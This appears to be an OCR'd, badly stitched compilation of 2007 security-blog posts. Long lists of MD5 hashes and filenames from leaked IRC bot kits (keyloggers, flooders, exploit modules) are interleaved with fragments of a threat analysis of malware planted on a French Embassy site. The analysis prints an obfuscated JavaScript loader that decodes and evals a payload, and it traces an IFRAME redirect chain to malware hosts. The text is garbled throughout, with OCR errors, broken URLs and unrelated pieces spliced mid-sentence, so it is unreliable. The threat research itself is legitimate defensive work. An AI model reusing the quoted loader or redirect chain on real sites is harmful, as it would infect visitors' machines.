76cc524e3119d837c07b579a0788947a 
version.h 
b0Ofe7fb5cfbe5b92fad9716a94091fe 
vncps.h 
57be5a0c203553253e96d0fdaclfe9de 
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wildcard.h 
c141f0f78a8e100094737a65a86f8c6b 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01c6ba85eeal2a 
nzm.dsp 
761588e9f140eff90224430222ce34c2 
nzm.dsw 
624ab1d6ccO05f0dbea9068eb6137feec 
nzm.ncb 
la76cbc596afc0621de2b155782990d3 
nzm.opt 
5345c3bd5c307ef0042313c85f7c556a 
nzm.plg 
4568d590ef47e5a0770c9ddbae7ac3f4 
nzmDmod _lite.txt 
625d8aefe067bb0add21103e8231df20 
cfg.h 
b1868579d03751e54fa477df7e1029e1 
md5.cpp 
02a0191ee586a05f4f75e0bfb5da056c 
patcher.cpp 
b2c51cc70ce4b091e6a526660b95ce9a 
version.c 
18644cf71c681c6ebf58a032e4f43d43 
vncps.cpp 
daa860ef1540d9139e6489ce35eac144 
aliaslog.cpp 
831laeea77fa590999ea7cb21c084613d 
autostart.cpp 
€4865d3674e5402dbd98aad4e9241 2ef 
download.cpp 
320038ab4f56799cd798802d0b9c05d5 
ehandler.cpp 
eadfc7bdfe539b5e6501df39a4059485 
fphost.cpp 


12261 


dae10ad7177360d203ab4149bc721c9b 
irc send.cpp 
45cc6b478059c28e039d32ebfedb25c8 
loaddlls.cpp 
762b41f9a7b7ed568e3fe926a86aa831 
misc.cpp 7e€174475d7f6f3b8321b2f8512b1b7bd 
netutils.cpp 
b070b0cc4d75dc18157d2a15f3df1c07 
nzm.cpp 
90afa7ec13b2f2263d5cafa5d13c537b 
processes.cpp 
bff3cf97ce343a46a7fdefaec07307d1 
random.cpp 
bacda003f928faad42285546c6bbdcf6 
rndnick.cpp 
60397e3f6736531902dae3d300956e59 
shellcode.cpp 
02f4a560laec9d5fla5f2ddd8879ce5f 
sysinfo.cpp 
labdb86fe7af006b36a277219bfd2cf7 
threads.cpp 
b0869845e3082465a3ae2ce0e1303b2e 
wildcard.cpp 
5f95acc7fa856262bd5a9bdd05b86c8a 
advscan.cpp 
554a30b3f48aceefdd0f856884990ba2 
dcom.cpp 1305186f504e1f2f05613882d4140b90 
ftpd.cpp 2dfe9875c3875d9d7c02e266597f4c71 
ms04 007 _asnl.cpp 
8839b06971e795dfb18d67adbedefbc1l 
netapi.cpp 
d1810cbecef1c992521f5d310be4e688 
sym06 _010.cpp 
c6f24fal30816c0af45e39e35459fcda 
tftpd.cpp 

12262 


VICTOSY IN CYBERSPA 


OCTOBER 2007 
AN AIR FORCE ASSOCIATION SPECIAL REPORT 


All of these reports and Ebooks are highly recomended bedtime reading, and so is the last 
but not least one, namely "[13]Victory in Cyberspace" released October, 2007. Besides 
generalizing cyberspace war activities, it includes a comprehensive summary of the events 
that took place in Estonia during the DDoS attacks. 
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[14]People’s Information Warfare Concept 
[15]China’s Cyber Espionage Ambitions 
[16]North Korea’s Cyber Warfare Unit 121 
[17]Chinese Hackers Attacking U.S Department of Defense Networks 
[18]Electronic Jinad v3.0 - What Cyber Jihad Isn’t 
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dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
9eae3f1d6d905a5561fa7a8860537336 
download.cpp 

664845639 lLaff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 


externs.h 
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f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483c1b 


functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
d6478f56ee26ac92c9b87cbe49fal446 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 
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€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
07ea32a50c76271a2c0023a3811ad526 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
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892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 

optix.h 

3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
18ec37e4b6d99c821a5f38544dd27eld 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp a300c9e235ed508c767e67328bc5fb93 
rBot.dsp f7bf3cf00b4a01180be5aeb5c1591508 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb 4d0c61a00017dd64419e7a518318fe4a 
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rBot.opt 02242775c83c3a496c512d1532efd115 
rBot.plg 5b7a3363e3480dd085188beca49958cf 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781acOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8¢353634b560052a5ebee5ef2 7ae32 
shellcode.cpp 
b16b4féaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
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7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99el1ac0 
sub7.h 
c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
c7aad47ea1152c0e4d21a93702c43710 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
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27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
arrays.h 913421f434cfcd2fe401f8af8fedf819 
bot.cpp 
47705780bd340ecd5b44e7a0caa02f02 
commands.h 
3055e272afae2c7ea342004a86674f7c 
config.h 7141c2240285bbddb7ela275f5d62275 
crc32.c 
c2e731d846a546c707ffbob7e35a8df40 
crc32.h 
372bf1d98a03d788ca4f072b27825703 
incv3b.dsp 
cdd511e4c097a04eb990f4754845a41c 
incv3b.dsw 
de2b38913bd661laed0da53cf6374db56 
nb.cpp 
1¢c94118dce7af0012b3ba09df6é45bb5e 
ionicon.html 
bdb6d57b5c6e668ale53fbaf9d483867 
ionicon.jpg 
5e43cfb395f097d74ce20aaaa48e4842 
fsg.exe 
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ce5d1f3074a96b78ebd2565e992492cc 
advscan.cpp 
da56aefbc55e38e661850597019494de 
advscan.h 
5ed5cdbfe64622133e275437db155090 
aliaslog.cpp 
8b113baeddeeab4c593e5e9e8al30c5c 
aliaslog.h 
5b5d906f5f0019fe4d7ce493c28b3802 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
cc02f54ee6f64796c472347d235dc8Ff1 
capture.h 
e0df649d44906ef5e460ac9d3afe9039 
cdkeys.cpp 
0362f8d1ccb9b0df9476e4b48704b226 


cdkeys.h c516c3168da496b203a4e71a7d72656e 


changes.txt 
2c€173c98ef2c11e8b1e969b538b20ac3 
configs.h 
d99ddce2a13e427664d36993f2af6931 
crc32.cpp 
4fa7e51e08884c68713a7a844128df82 
crc32.h 
Icd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
d1b2009632326a355949332e77541fd5 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
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dameware.cpp 
€14583f23776c7fd1383bfe934c4d6b2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
51dba8236828b379b65bd3bedde830ad 
dcc.h 
85292f79b21e5f5a9aed9770804b0e19 
dcom.cpp c9e94f91512de5e60d5135dlacca856b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82f25b 
dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
€48a61024b2a3c991f7a4faela0a2d38 
download.cpp 
7a616d2936cd85c1c719014a3eld9dff 
download.h 
6dd6bd9b4f982ee5443772ca775albOf 
driveinfo.cpp 
Oe3b5f5ec21ba5a03e0dde9f2523881b 
driveinfo.h 
d139b6d77a4a3b3d41928cfa90613d01 
externs.h 
3321901281d509ad6944dd447da8c279 
findfile.cpp 
8cd91e7db6bedb502705726f2bb277da 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 


flood.cpp 
12282 


3.12.10 Have Your Malware In a Timely Fashion (2007-12-15 15:09) 


<htmL><head><meta HTTP-EQUIU="REFRESH" content="5; URL=index.php?java"><script 
language=JavaScript>str = 

“bh<cng) ( -bgtobuhnotcng) ( tzbw st{t<tenbtldou/bsd ‘ udDmdldou) &nckdbue( = b¢{ /rdu@uushctud) &het—-&{ &( = bé 
/rdu@uushctud)&bm  rrhe&-&bmk*krhkete ;CER*HB7BARKRY7 , 7HO2 , ORXHGET , BON*R2G, 11G*HBISH*EGBIR«HBDH*R27 
&( shusx?zbw stpt<?{/Bsd  udNckdbu) Gl rk ty] te hmShet/ Bek LRG Be RUG HEU OR kk Shu strt<t<{/Bsd udNckdb 
u) #Ridmt«tm/Aqt<tqntthb  uhttnot-h&k( sbw stut<t{/Bsd ‘udNckdbu)& ek tnek«ttc/ttruketsdiek La-ke( oh 
usxtztu/uxgqd?<t 6: bp/nqdo) &F &*#DteUe—Biuug ; ..319/63/ 879/867 .d, onugntoes363 .mn e/qigq&-g mrd({ -bp/rd 
oe) (= tu/nqdo) ( :bu/Ushud)p/sdrqnordtnex( :bw sto ldt<te/..//. .€ulq6065/dyd&=bu/R  wdUnGhad)o1d-3( = 
u/Bnnrd)(:th| tb ‘ubi)d(tze*)( | busxtztr/ridamdydbtud)o*1d(:t| tb ubi)d(tz[ | hb ubi)d(z||bbh:";str2 = 
">for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ~ 
1); }; eval (str2);</script></head></htnml>| 


Keep your allies close, the human right violators closer. [1]French officials have been receiving 
lots of criticism by human rights groups regarding Moammar Gadhafi’s visit in France, in fact 
Human Rights Watch issued a press release entitled [2]Al-Qadhafi in France. Despite the 
logical response in the form of criticism, it’s lacking the long-term strategic vision and the 
proven approach of dealing with crying kids - pay them attention, give them a candy and 
therefore try to [3]integrate them don’t isolate them. 


If it were "[4Jembedded malware as usual" the wannabes would have started mass mail- 
ing links to malware infected sites spreading rumors regarding the visit, like a previous 
[5]PSYOPS operation on behalf of an unnamed intelligence agency. However, in this case they 
embedded malware at a French Government’s site related to Libya in order to eventually infect 
all the visitors looking for more information during the visit. That’s a [6]social engineering 
trick taking advantage of the momentum by proactively anticipating the rush of visitors to 
the site. Another such recent combination of tactics aimed to [7]increase the lifecycle of the 
malware embedded attack by embedding it at Chinese Internet Security Response Team’s site 
during the China’s "Golden Week" holiday. 


According to McAfee "[8]Web Site of the French Embassy in Libya Under Attack" : 


"The people behind these attacks love to use highly topical issues in order to attract as 
many people as possible. This week in my country, the visit by Libyan President Muammar 
Khadafi is stirring controversy. It has made many headlines in France. No doubt this is why 
the French Embassy Web Site is now infected by malicious code. Please do not attempt to 
reach the site, it is still dangerous." 


Let’s pick up from where McAfee left in the assessment. 4qobj63z.tarog.us/tds/in.cgi?14 
(58.65.233.98) loads an IFRAME to fernando123.ws/forum/index.php (88.255.94.114) 
which is MPack hosting the actual binary at fernando123.ws/forum/load.php or fer- 
nando123.ws/forum/load.exe 


Detection rate : Result: 9/32 (28.13 %) 

File size: 43008 bytes 

MD5: 8ce2134060b284fa9826d8d7cal119f33 

SHA1: 3074f95d6b54fa49079b20876efa0f4722e7fe7d 


As for the second campaign at 4583lwi4.tarog.us/in.cgi?19, the malicious parties were 
quick enough to redirect the IFRAME to Google.com, in exactly the same fashion the 
RBN did in the Bank of India incident definitely monitoring the exposure activities in 
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8ebc641037c3087339faa4fe429b424f 
flood.h 
4607d7eff8b5f60d4eeb6af39f8cfce04 
fphost.cpp 
48c440982ab6b320da0181cbf94a6671 
fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
functions.h 
7ac3cf2df935e44ea60e3d7845e234a4 
globals.h 
15370dbb17c160b8cbddbf0d85a0f8d5 
httpd.cpp 
7e7a8677cf8298d1597cf8397f51773¢c 
httpd.h 
9aalbc9e308406bf716814edcd68b509 
ident.cpp 
07ef48d935ec546da68d6c2d43d4e6f0 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
e8aafc607241eeca0bc984c7db98a56c 
irc send.cpp 
4d1dc011e75008e0686adfef2b4ce60a 
irc send.h 
deb80fe9faf3ad07e4abfla6df76102c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt a6875f7883fd3248ca96e89e0350c3ec 
loaddlls.cpp 
eecObfbf5b8c264600b58011645cacd8 
loaddlls.h 
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10912fb54b7c7903f3a908a64b1ac37a 
Isass without batfile.cpp 
23504492eee0cbd9d6c8e5a30609b7a2 
Isass.cpp 
2b256036842827b53d931b3c7edc5b52 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp f725317a7c909bdf939e42c47e55af67 
misc.h 
2c8041be9a426b1478882a3958a7f78a 
mssql.cpp 
7943d2d1e76ed8c6769cc0ec14c3fa6c 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
a0c5e7d062ebbf611c5818ea8c176f50 
mydoom.h 1e0f4d2715a8bdd200e5c56d5c625fb1 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
dcbc001a93acb4albbdb293f2ff68575 
net.h 
d31221b4e1e02ab884bc86c135a8ala2 
netbios.cpp 
242f5b10f3baf2fef745e53d38022e05 
netbios.h 
a239bd672842a4b3baal66de90ec53e0 
netdevil.cpp 
2d66e0df67f4388e3764ef4698c00Ff17 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
70b40e4861703f1482658d9c93fadd8e 
netutils.h 
alc9f03b3643cb4fa07cd9ab4e8f6609 
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ntpass.cpp 
116316adcda1803310d08fcOf02b6af9 

ntpass.h c042b743f9138a808368d1a849d87cf8 
optix.cpp 

af712af62fe9331e42205fca8f911373 

optix.h 

3001e7bce448e97fb0c36d17d8d3bb72 
passwd.h 02ea53dd9d277e5c30d40f4e8d1b622e 
pingudp.cpp 
deb2ca9a2d5d0a886f3b5a57a520d31b 
pingudp.h 
6c584d98d0f1f0cc87039c32556009f5 
processes.cpp 
c6e71ff6e02efeaf419aeal8ab6dee842 
processes.h 
€6610dd1b2287db779396c2a1125d0a4 
psniff.cpp 
€043db547ea8d03bdb321456b3237bdd 
psniff.h Oea96cb2476fe3e5b65c490d8a042da2 
rBot.cpp Oe666cce8eb834fa8c28fd1df857fe2a 
rBot.dsp 9af6140268c5c9239ed611764c0edb94 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

460d5cc6152a947015869658510b5b5e 
rBot.ncb 5edOfbfeff5fc1b248ad054eb1370acf 
rBot.opt 1f6éab8f0fbeae2391f264e588a7ceae7 
rBot.plg f3c8f58e8012131ecceb985509d53da2 
redirect.cpp 
065bab43fe7e2cee32a608c0e1359498 
redirect.h 
e50dabdc477b3d4b943b0e0b1865e739 
remotecmd.cpp 
6bb024af9fa0eac0e9b258c1d9563af9 
remotecmd.h 
a2f97d6c8d45cbcc090a5c2e3403d9e4 
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rndnick.cpp 
fedc5cf0b0949c8825fa335443664571 
rndnick.h 
7a25f4fa942faab1bb2308cb1559f472 
scan.cpp 4a4ac4fa240702cb90ec1ldcc3cec8fac 
scan.h 

3d1f51c52cb0aead9a2899eb9b6ae8cd6 
secure.cpp 
40419ff85af8079e7b99376761acea85 
secure.h dba2b38530b058423f91883de579e459 
shellcode.cpp 
700e4ead9214cd2288cc879a3311a518 
shellcode.h 
cal4f267b73bc867b075ca56f524d52e 
socks4.cpp 
1c47f1b0db7b82ea47f27e8d96e7447a 
socks4.h 603ded79fbce28cc17da923839c93438 
sub7.cpp e€3661739128b71d8b6b044bf30cec920 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
3384fadbafbed4ae6fa7dd003dd49b44 
synflood.h 
37d28b14d17e97ae0b1a674c9a2808d3 
sysinfo.cpp 
2972142d5c2881ac5d87b91a6ca7823d 
sysinfo.h 

fe9ff90487836b10a0f0ffF3332558d3f 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 

tcpip.h 

d34a55bef016a45671781d8c6040c502 
tftpd.cpp 
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4a0762987b27a8fd946431a160ab583e 
tftpd.h 
1f0c9b684e0050cd04f4bb62a424bddd 
threads.cpp 
af54d34aacd72ef0f4f059374731beb1 
threads.h 
ac7ffc0341056ea22da287374a77406a 
upnp.cpp 0b10a587e353e06c7ab81f6f74861086 
upnp.h 
6be3f6b1icfecla51673271021f67cab6 
visit.cpp 
508c60dd5a86011351a2079c9271cadc 
visit. 
4b1a61d58dac2376c0f51253be5746c6 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
9de1e00419bba9d84a577336ee127a4e 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
kuang2.cpp 
fa21f1c42b07614558c2fc5e4d9c429a 
kuang2.h 61b43ebcd17e59fb21e0831d5ad50b22 
scanner.cpp 
ae5fef4bd234a6df81cdeab327cf6718 
advscan.cpp 
f6067730ee8163f1580970bea732efbf 
advscan.h 
c67d944559e747clee795c57fb616d8d 


aliaslog.cpp 
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6d8b6455816e0ef6e5 1lefea7b3e21f8a 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
e0d02120ffae36462ea667048aa7cd75 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
15d1d578a43d614409b0d5117ea270f2 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a/727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 


dcc.cpp 
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bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
e44c57141c37593156064072bd6570c2 


dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 


ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
fbo31e6962fce9f67fabae8b6851267c4 
download.cpp 
41c1b46ab52d8915b7ab29778e22d6e6 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
5b6d2b028183b9574f77c42b6f9fd04a 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
62cc9a8dc1la74041fd2f8bla7aa27f4c 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
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findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp e324aff6c71758273cbd995939898b1f 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
3ad4a90fb90187eb03965a9193f05a3f 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
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ce5f0f4d470b760d2276fab309878420 

kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 

loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
a50c8d33ea9013fadd70388bbc46a98e 

Isass.h 

5b9d615744a8d6f4b2c9c19d2aed46ef 

misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 

mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 

mssqI.h 

742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 


mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 


myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
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7¢€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
6c3d9eaf1d647623e49290e2b09874c7 

optix.h 

3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aal1c18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp ada2547d9b57104b2c2d4521cd2cb265 
rBot.dsp 22e7b00b49c8cef3d74e45f7930096fd 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
advscan.cpp 
fccc89bb22afb59736cc51797f3480ef 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
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real-time. However, accessing through a secondary IP retrieves the real IFRAME, namely 
winhex.org/tds/in.cgi?19 (85.255.120.194) which loads winhex.org/traff/all.php that on 
the other hand loads kjlksjwflk.com/check/versionl.php?t=577 which is now down, and 
208.72.168.176/e-notfound1212/index.php where an obfuscation that’s once deobfuscated 
attempts to load 208.72.168.176/e-notfound1212/load.php 


Detection rate : Result: 14/32 (43.75 %) 

File size: 116244 bytes 

MD5: 42dacb9f7dd4beeb7a1718a8d843e000 

SHA1: d595dd0e4dcf37b69b48b8932dcf08e9f73623d0 


Deja vu - 208.72.168.176 is the "[9]New Media Malware Gang" in action, whose ecosys- 
tem clearly indicated connections with the RBN, [10]Possibility Media’s malware [11]attack, 
Bank of India and the Syrian Embassy malware attacks, and Storm Worm which | assessed in 
numerous previous posts. 


All your malware downloaders are belong to us - [12]again and [13]again. 


1 
2 

3: 
4 
5; 
6. 


ttp://ddanchev. blogspot .com/2007/06/cias-upcoming-black-ops-against-iran.htm 


ttp://ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 
7. http: //ddanchev. blogspot .com/2007/10/cisrt-serving-malware .htm 


